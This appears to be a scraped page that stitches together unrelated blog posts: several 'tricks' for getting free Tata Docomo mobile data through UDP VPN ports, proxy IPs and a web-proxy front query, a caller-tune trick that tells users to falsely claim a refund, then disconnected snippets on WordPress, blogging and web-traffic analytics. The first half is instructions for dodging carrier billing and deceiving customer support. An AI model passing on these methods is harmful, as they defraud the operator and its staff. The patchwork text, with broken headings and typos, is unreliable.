You need to Use the Sim card which you
get with the New Dongle
Use Access Point as: TATADOCOMO3G
Minimum 1 Rs. balance Needed.
Now Connect with Any UDP VPN which
has LPORT 53, or 443
You can use any of the VPN listed Below
Peoples VPN, VPnBook VPN, xtreame
VPN, SpotFlux Or any other Config
which with the above port.
That’s All. by Following the above steps
will enable you to Use high Speed Tata
Docomo 3G UDP Trick
NOTE: This is working almost In every
State, It Will only Work in New Sim
cards which comes along with the tata
Docomo 3G Dongle.
Screenshot Using the Above Tata
Docomo 3G UDP Trick
Trick: 2
This is the another Direct Trick for tata
docomo, you can use this If you Don’t
have A New tata Docomo 3G data Sim
card, but note of you have Recharge
your SIM for Rs.250 in which you get
Full Talktime of Rs.250 and 1 GB 3G
Data Free
Recharge your Tata Docomo With Rs.
250 (you will get Full 250 Rs Talktime)
Now Connect with APN:
TATA.DOCOMO.INTERNETHVC
Now Use Any UDP based VPN which
has Lport 53 in its Config
you can Connect with: VPNBOOK,
Spotflux, Peoples, and Others in our
VPN Section
That’s All.
After Using the VPN, you 3G balance
won’t deduct by this method you can
use Unlimited 3G Without Any Speed
capping
This is tested in many States Like U.P
East and West, All Northern ,
Karnataka, M.P and Others.
So Guys, Who all are using the
Vodafone TCP Tricks and are fed up of
Slow Speed should Try this, This is only
Working Docomo Trick Scattered over
The Web., There is no Other Trick
working Now. Stay Tuned with Us for
more Surprises and Tricks and

Cocomo free gprs for two months

Just read this and try it!
Steps:
1. Install the original settings by
sending sms DIVEIN to 52270 (toll
free)
2. Edit the settings received like
this:
Proxy/ IP address: 10.124.94.9
Home page:
internet.tatadocomo.com.t9space.com.php
Other settings remain as it is
Just try this trick!
Good luck!
Another proxy settings for tata
docomo:
121.170.121.191
(Use in Divein settings)
10.124.26.94
(Use in INTERNET settings)
Tata Docomo balance transfer trick:
send an sms as shown below:
BT (mobile num) (amt) to 121.
Amount specified will be deducted
from balance.
Docomo free talk-time trick:
Sms REWARD to 121 and you will
get 20minutes free docomo to Tata
(any) talk-time
Also you will get unlimited free sms
for somedays.
Free GPRS:
Sms WINDOWS to 54321 and you
will get 600MB free gprs usage for
2months.

Docomo free gprs tricks for android users advanced for 2014

Hey Friends, This is my second trick
or hack of the day, in my last post I
told you that how you can use free
Airtel 3G internet on your computer .
Now I am going to tell you that how
you can use free Tata Docomo 3G
internet on your android device or
mobile. I have been looking for Tata
Docomo 3G and 2G internet trick
since I last time posted Tata
Docomo Free 3G and 2G internet
hack back in September.
To Read tricks and hack related to
other service providers like
Vodafone , Reliance , Tata Docomo ,
Uninor, BSNL , and Idea please read
this post .
This trick is very simple and is only
useful for people who are using
Android devices like Android enabled
smart-phones and tablets. This trick
is based on a application which is
available only for Android devices at
Google Play. This application which
i am talking about is a VPN
application so it is also a VPN hack.
So without wasting any more time I
will tell you what's the trick and how
to use it.
1. First visit this link and download
the android application from
Google Play. Applications name
is Droid VPN.
2. Now open this link in your
browser and sign up for a free
account.
3. Now open the application and go
to Menu>Settings and then use
the following information in the
settings.
Connection
Protocol- udp
UDP Port- 9751
Bind Local Port-
xx
4. Only change the setting given
above and leave other settings
unchanged and save it.
5. Now try to connect to internet
with Droid-VPN using Apn as
TATA.DOCOMO.INTERNET
That's it , now enjoy free Tata
Docomo 3G internet on all your
Android Devices. Don't forget to like
our page on Facebook and follow us
on twitter.

Docomo free callertone trick

hello guyzz!!!!! I am posting this free Call
Me tunes trick for tata docomo which is
100% working. !! Here is the trick-
1.) First deact call me tunes if u
activated by sending CT sms
2.) Than dial 543211999 for 1 month
subscription .
3.) Select one from given 2 songs.
4.) After confirmation sms if u want to
change SONG dial *678*020# OR
*678*030# and than reply with # for
main menu.
5.) Select song that u want. .and enjoy
free ct.
NOTE- FOR changing Song ur balance
should be not greater than 10 rs .
Also to be on safe side try all this in low
balance.
Balance is not deducting if it is deducted
than call 121 and complain about it.
They won't have any detail of this
activation there, So they will refund ur
amount. Enjoyyy!!!

Docomo free gprs proxy settings its get highspeed of they are provuded

If You are in search of Free GPRS/
Internet Trick for September 2012,
the search ends here.
I am introducing a new trick for
Tata Docomo 2g/3g gprs/internet
for FREE.
Hope this free gprs trick works in
for all atleast in 2012 December or
may continue beyond JAN 2013.
Use the Following Setting's in your
Mobile to get free Tatadocomo
2g/3g gprs/internet trick.
Step 1:- Use divein setting in
your mobile.
Step 2:- you need Handler
application for this trick.
put frontquery:
10.124.72.171.203.200.118.
92.flyproxy.com/nph-
proxy.pl/010110A/http/
Step 3:- Install handler apps
and use free airtel gprs in
mobile.
you can use this trick in PC
also by put given Fq in
browser url
like
10.124.72.171.203.200.118.
92.flyproxy.com/nph-
proxy.pl/010110A/http/
resultof.com

Tata docomo gprs tricks new settings

Hello Dear Friend’s,
Today We Are Back With Tata Docomo
Free GPRS Trick.
Just Use Below Settings:-
Apn:- tata.docomo.dive.in
Homepage:- http://www.google.com
Proxy:- 220.226.181.88
Port:- 8080 OR 80
Note:- Save This Settings, Apply And
Restart Your Mobile.

Website desingn with templates

“H
Blogging
consistency and
keeping a regular
blog posting
frequency
Do not worry
about SEO, just
concentrate on
your readers
How to create a
sales letter
landing page
with WordPress
Thesis Theme
12 tips to make
2013 your best
year yet
How To Edit
Pictures For
Your Blog
4 Blog Building
Tasks To
Outsource to a
Filipino
Employee

Designing blog as a wonderful site just follow some methods

There is a lot of debate going on right
now in the WordPress world about the
WordPress Foundation barring all
ThemeForest/CodeCanyon (Envato really)
authors from speaking at WordCamp
events.
I don’t want to rehash the argument here;
the best place to get it is in the original
post , and the comments on it.
Instead, I want to make a different point:
Regardless of whether he is right or not,
it’s good for WordPress that Matt makes
these bold choices.

Wbsite traffic genarate simply

Web traffic is measured to see
the popularity of web sites and
individual pages or sections
within a site.
Web traffic can be analyzed by
viewing the traffic statistics
found in the web server log
file, an automatically
generated list of all the pages
served. A hit is generated
when any file is served. The
page itself is considered a file,
but images are also files, thus
a page with 5 images could
generate 6 hits (the 5 images
and the page itself). A page
view is generated when a
visitor requests any page
within the web site – a visitor
will always generate at least
one page view (the main page)
but could generate many
more. Tracking applications
external to the web site can
record traffic by inserting a
small piece of HTML code in
every page of the web site.[2]
Web traffic is also sometimes
measured by packet sniffing
and thus gaining random
samples of traffic data from
which to extrapolate
information about web traffic
as a whole across total
Internet usage.
The following types of
information are often collated
when monitoring web traffic:
The number of visitors.
The average number of
page views per visitor – a
high number would indicate
that the average visitors go
deep inside the site, possibly
because they like it or find it
useful.
Average visit duration –
the total length of a user's
visit. As a rule the more time
they spend the more they're
interested in your company
and are more prone to
contact.
Average page duration –
how long a page is viewed
for. The more pages viewed,
the better it is for your
company.
Domain classes – all
levels of the IP Addressing
information required to
deliver Webpages and
content.
Busy times – the most
popular viewing time of the
site would show when would
be the best time to do
promotional campaigns and
when would be the most
ideal to perform maintenance
Most requested pages –
the most popular pages
Most requested entry
pages – the entry page is the
first page viewed by a visitor
and shows which are the
pages most attracting
visitors
Most requested exit
pages – the most requested
exit pages could help find
bad pages, broken links or
the exit pages may have a
popular external link
Top paths – a path is the
sequence of pages viewed by
visitors from entry to exit,
with the top paths identifying
the way most customers go
through the site
Referrers; The host can
track the (apparent) source
of the links and determine
which sites are generating
the most traffic for a
particular page.
Web sites like Alexa Internet
produce traffic rankings and
statistics based on those
people who access the sites
while using the Alexa toolbar.
The difficulty with this is that
it's not looking at the complete
traffic picture for a site. Large
sites usually hire the services
of companies like Nielsen
NetRatings, but their reports
are available only by
subscription.

Genarate trafic on google

Along with the reports in your account,
you can use Google Analytics to measure
the traffic generated by your books in
Google Books. Google Analytics tracks
incoming traffic to your website; this data
gives you more insight into how readers
interact with your site when they arrive
from Google. In addition to the quantity
and quality of this traffic, you can see
how many of these readers coming from
Google complete a purchase on your site.
Please note that in order to properly use
Google Analytics, you must be able to
make direct edits to the HTML code of
your site.
On this page, we'll show you how to
create a number of useful reports related
to Google Books with your Google
Analytics account. If you haven't yet
signed up for Google Analytics, you can
do so by visiting the Google Analytics
Getting Started Guide , on the Google
Analytics Help Center.
Use Google Analytics to track Google
Books traffic
There are several useful features of
Google Analytics that allow you to see the
traffic that's coming to your website from
Google Books.
All Traffic Sources. To get a better idea
of the visitors that you're getting from
Google Books, we suggest using the All
Traffic Sources report. Select Traffic
Sources and then click All Traffic. If you
type [ books.google ] (without the
square brackets) into the search field,
you'll see the visitors that have been
directed to your site from Google Books.
This report tells you how many pages of
your site these visitors look at per visit.
Referrals. The Referrals report allows you
to look deeper into the traffic that you're
getting from Google Books. You'll also
find this report under Traffic Sources .
The Referrals report tells you which
individual pages on Google Books have
generated the most traffic for your site.
Again, type [ books.google ] into the
search field to restrict the report to Google
Books referrals. Then open up the full
range of data by clicking on the
books.google row. You'll see the
statistics broken out into a page-by-page
view.
Map Overlay. Curious to know where in
the world your visitors are from? With this
feature, which you can access by
selecting Demographics and then clicking
Location, we'll show you the
geographical locations of your visitors
superimposed on a map of the world.
Additional features
Analytics is a helpful tool to track your
Google Books stats, but it has many other
features that you may find useful as you
develop your website. For example, you
can set internal tracking goals on your
site, which could allow you to find out
how many of your visitors are making
purchases on your website. To find out
more about this feature, we encourage
you to visit Google Analytics Conversion
University . For general Analytics
questions, please visit the Google
Analytics .